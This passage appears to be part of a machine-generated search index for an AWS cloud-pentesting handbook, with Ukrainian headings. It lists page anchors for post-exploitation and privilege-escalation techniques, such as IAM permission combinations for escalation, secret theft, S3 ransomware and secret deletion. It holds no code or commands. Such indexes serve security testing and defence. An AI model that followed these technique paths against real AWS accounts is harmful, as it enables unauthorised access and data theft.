ting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#lightsail","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#Відновлення-старих-знімків-бази-даних","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#Відновлення-знімків-екземплярів","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#Доступ-до-чутливої-інформації","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#aws---Організації-Після-Експлуатації","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#Організації","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#Вийти-з-організації","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#aws---rds-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rds","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdscreatedbsnapshot-rdsrestoredbinstancefromdbsnapshot-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsmodifydbsnapshotattribute-rdscreatedbsnapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdownloaddblogfileportion","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdeletedbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsstartexporttask","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#aws---s3-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#Чутлива-інформація","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#Півтування","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3-Вимагач","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#aws---secrets-manager-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#secrets-manager","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#Читання-секретів","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-Зміна-значення-секрету","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-Зміна-ключа-kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-Видалення-Секрету","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#aws---ses-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#ses","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendrawemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendtemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulktemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulkemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbounce","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendcustomverificationemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#aws---sns-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#sns","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#Порушити-Повідомлення","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsdeletetopic","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snspublish","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssettopicattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssubscribe--snsunsubscribe","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsaddpermission--snsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snstagresource--snsuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#aws---sqs-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqs","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsdeletequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqspurgequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssetqueueattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqstagqueue--sqsuntagqueue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#aws---sso-та-identitystore-Після-Експлуатації","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#sso-та-identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#ssodeletepermissionset--ssoputpermissionsboundarytopermissionset--ssodeleteaccountassignment","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#aws---step-functions-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesrevealsecrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesdeletestatemachine-statesdeletestatemachineversion-statesdeletestatemachinealias","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatemaprun","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesstopexecution","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statestagresource-statesuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatestatemachine-lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#Налаштування-жертви-Контекст-для-експлуатації","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#aws---sts-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#sts","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#Від-iam-облікових-даних-до-консолі","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#Обхід-обмежень-user-agent-з-python","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#aws---vpn-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#vpn","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws---Підвищення-Привілеїв","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#Підвищення-Привілеїв-в-aws","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#Інструменти","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#aws---apigateway-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigateway","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewaypost","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdaterestapipolicy-apigatewaypatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayputintegration-apigatewaycreatedeployment-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdateauthorizer-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdatevpclink","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#aws---chime-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#chimecreateapikey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#aws---codebuild-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildcreateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch-s3getobject-s3putobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#aws---codepipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#iampassrole-codepipelinecreatepipeline-codebuildcreateproject-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codebuildupdateproject-codepipelineupdatepipeline-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipelinepollforjobs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#aws---codestar-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestar","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateprojectfromtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws---cloudformation-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationcreatestack","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatestackset--cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#iampassrole-cloudformationcreatestackand-cloudformationdescribestacks","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#aws---cognito-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#Збір-облікових-даних-з-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identitysetidentitypoolroles-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identityupdate-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreategroup--cognito-idpupdategroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminconfirmsignup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmincreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminenableuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmininitiateauth--cognito-idpadminrespondtoauthchallenge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetusersettings--cognito-idpsetusermfapreference--cognito-idpsetuserpoolmfaconfig--cognito-idpupdateuserpool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminupdateuserattributes","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserpoolclient--cognito-idpupdateuserpoolclient","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserimportjob--cognito-idpstartuserimportjob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateidentityprovider--cognito-idpupdateidentityprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-sync-Аналіз","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#Автоматичні-інструменти","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#aws---datapipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#datapipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#iampassrole-datapipelinecreatepipeline-datapipelineputpipelinedefinition-datapipelineactivatepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws---Привілейоване-підвищення-в-directory-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#directory-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#dsresetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws-management-console","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#aws---dynamodb-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodb","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodbputresourcepolicy-і-за-бажанням-dynamodbgetresourcepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#Постексплуатація","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#todo-Читати-дані-зловживаючи-потоками-даних","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#aws---ebs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebslistsnapshotblocks-ebsgetsnapshotblock-ec2describesnapshots","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ec2createsnapshot","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#aws---ec2-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole---iamaddroletoinstanceprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole--ec2associateiaminstanceprofile-ec2disassociateiaminstanceprofile--ec2replaceiaminstanceprofileassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2requestspotinstancesiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2modifyinstanceattribute","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2createlaunchtemplateversionec2createlaunchtemplateec2modifylaunchtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscalingcreatelaunchconfiguration-autoscalingcreateautoscalinggroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscaling","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendsshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendserialconsolesshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#describe-launch-templatesdescribe-launch-template-versions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#aws---ecr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtokenecrbatchgetimage","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtoken-ecrbatchchecklayeravailability-ecrcompletelayerupload-ecrinitiatelayerupload-ecrputimage-ecruploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicgetauthorizationtoken-ecr-publicbatchchecklayeravailability-ecr-publiccompletelayerupload-ecr-publicinitiatelayerupload-ecr-publicputimage-ecr-publicuploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrputregistrypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#aws---ecs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsstarttask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistertaskdefinition--ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsexecutecommand-ecsdescribetasks-ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistercontainerinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecscreatetaskset-ecsupdateserviceprimarytaskset-ecsdescribetasksets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#aws---efs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#efs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemdeletefilesystempolicyelasticfilesystemputfilesystempolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemclientmountelasticfilesystemclientrootaccesselasticfilesystemclientwrite","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemcreatemounttarget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemmodifymounttargetsecuritygroups","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#aws---elastic-beanstalk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-дозволи-на-запис-s3-та-багато-інших","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplication-elasticbeanstalkcreateenvironment-elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-iampassrole-і-більше","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-cloudformationgettemplate-cloudformationdescribestackresources-cloudformationdescribestackresource-autoscalingdescribeautoscalinggroups-autoscalingsuspendprocesses-autoscalingsuspendprocesses","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#aws---emr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#iampassrole-elasticmapreducerunjobflow","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreducecreateeditor-iamlistroles-elasticmapreducelistclusters-iampassrole-elasticmapreducedescribeeditor-elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#aws---eventbridge-scheduler-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#iampassrole-schedulercreateschedule--schedulerupdateschedule","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#aws---gamelift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#gameliftrequestuploadcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#aws---glue-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatejob--glueupdatejob-gluestartjobrun--gluecreatetrigger","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatejob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#aws---iam-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreatepolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamsetdefaultpolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateloginprofile--iamupdateloginprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateservicespecificcredential--iamresetservicespecificcredential","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachuserpolicy--iamattachgrouppolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachrolepolicy---stsassumeroleiamcreaterole---iamputuserpolicy--iamputgrouppolicy--iamputrolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateassumerolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamuploadsshpublickey--iamdeactivatemfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamresyncmfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdatesamlprovider-iamlistsamlproviders-iamgetsamlprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateopenidconnectproviderthumbprint-iamlistopenidconnectproviders-iam-getopenidconnectprovider-","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#aws---kms-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kms","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmslistkeyskmsputkeypolicy-kmslistkeypolicies-kmsgetkeypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreategrant","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreatekey-kmsreplicatekey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmsdecrypt","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#aws---lambda-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdainvokefunction--lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreateeventsourcemapping","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddlayerversionpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctionconfiguration","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreatefunctionurlconfig-lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda-mitm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#aws---lightsail-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsail","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsaildownloaddefaultkeypair","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetinstanceaccessdetails","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatebucketaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetrelationaldatabasemasteruserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdaterelationaldatabase","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailopeninstancepublicports","pentesting-